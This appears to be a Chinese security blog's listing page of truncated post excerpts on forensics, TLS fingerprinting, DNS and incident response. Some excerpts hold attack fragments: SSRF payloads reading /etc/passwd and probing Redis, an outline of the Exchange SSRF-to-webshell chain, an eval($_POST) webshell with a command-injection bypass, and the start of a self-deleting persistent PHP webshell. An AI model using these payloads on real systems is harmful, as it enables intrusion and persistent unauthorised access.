摘要:
#下载环境 https://csilinux.com CSI Linux User:csi Passwd:csi 更新powerup Kali linux 开启forensic http://dftt.sourceforge.net/ #操作 ##Autopsy http://dftt.source 阅读全文
摘要:
参考链接http://pkiglobe.org/subject_alt_name.html When this SSL server certificate is presented to the browser and if the domain from where the certificat 阅读全文
摘要:
偶然看到一篇介绍JARM工具的文章,用于识别TLS指纹,其中还可以用于Cobalt Strike识别。 #关于JARM ##工具介绍 一个TLS服务器指纹识别工具 https://codeload.github.com/salesforce/jarm/zip/refs/heads/master 通过 阅读全文
摘要:
#背景 一张图片,DNS记录,包含4个IP地址 #DNS记录 A记录: 将域名指向一个IPv4地址(例如:100.100.100.100),需要增加A记录 CNAME记录: 如果将域名指向一个域名,实现与被指向域名相同的访问效果,需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名 MX记 阅读全文
摘要:
记录一下断网的几种操作: 为什么要断网? 中毒 防止横向移动 怎么做? 拔网线 卸载网卡 /etc/modprobe.conf,删除alias eth1 XXXX /etc/sysconfig/networking/devices目录下,将ifcfg-eth1删除 /etc/sysconfig/ne 阅读全文
摘要:
#协议 ##file协议 读取文件 file:///etc/passwd/ /etc/hosts 获取内网地址 /etc/network/interfaces 需要高权限 ##dict协议 探测端口 dict://127.0.0.1:6379 ##gopher 二次 URL 编码实现POST请求 # 阅读全文
摘要:
#漏洞简介 CVE-2021-26855 SSRF CVE-2021-27065 任意文件上传 最终实现上传asp马 总的利用过程:SSRF获取SID->实现CVE-2021-27065文件上传 #CVE-2021-26855 POC请求分析 ##OWA ssrf GET /owa/auth/xxx 阅读全文
摘要:
#通过dig获取 dig @xxx.xx.xx.x version.bind chaos txt 获取信息 ;; ANSWER SECTION: version.bind. 0 CH TXT "9.8.1" #通过Banner获取 #通过nslookup查询 nslookup -q=txt -cla 阅读全文
摘要:
#什么是Socket socket包含进行网络通信必须的五种信息:连接使用的协议,本地主机的IP地址,本地进程的协议端口,远地主机的IP地址,远地进程的协议端口。 创建socket连接时可以指定使用的传输层协议,socket可以支持TCP或UDP协议。 #什么是socket(AF_INET&SOCK 阅读全文
摘要:
#背景 某YAPI使用的数据库存在未授权访问,在Mongodb中发现疑似账户和密码的信息,尝试新增管理员权限用户实现登录YAPI管理台。 #形式 加密字符串如下 $2b$10$Y2Fxxxxxn/uxxxx/TXxxxx 搜了一下 是bcrypt加密,这种加密算法一般用于nodejs中加密字符串是放 阅读全文
摘要:
#背景 一个黑页 eval($_POST['xxx']) 其实扫备份文件是可以扫到的 但是做的时候没扫 直接做了 #尝试 存在部分关键词过滤,其中正常应该使用POST:a=system("ls"); 但此处;被过滤 发现可以使用?>,即a=system("ls") ?> ##尝试获取源码 先看下文件 阅读全文
摘要:
#Attack ##漏洞利用 文件上传 任意文件读取 ##webshell上传 不死马确实好用 <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '3.php'; $code = '<?php if 阅读全文